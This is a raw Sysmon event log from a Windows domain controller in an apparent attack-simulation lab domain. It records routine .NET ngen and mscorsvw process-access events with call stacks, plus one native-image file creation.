13:21:57.899{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1E02-000000009A01}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.868{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1D02-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.852{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1D02-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.852{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1D02-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.805{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1C02-000000009A01}2992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.789{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1C02-000000009A01}2992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.789{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1C02-000000009A01}2992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.743{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1B02-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.727{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1B02-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.727{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1B02-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localEXE2021-01-14 13:21:57.680{08A6967A-4575-6000-1A02-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13cc-0\Microsoft.Workflow.Compiler.exe2021-01-14 13:21:57.680 10341000x80000000000000006206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.524{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1A02-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.524{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1A02-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.524{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1A02-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.336{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1902-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.336{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1902-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.336{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1902-000000009A01}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.289{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1802-000000009A01}3728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.274{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1802-000000009A01}3728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.274{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1802-000000009A01}3728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.227{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1702-000000009A01}1472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.211{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1702-000000009A01}1472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.211{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1702-000000009A01}1472C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.164{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1602-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 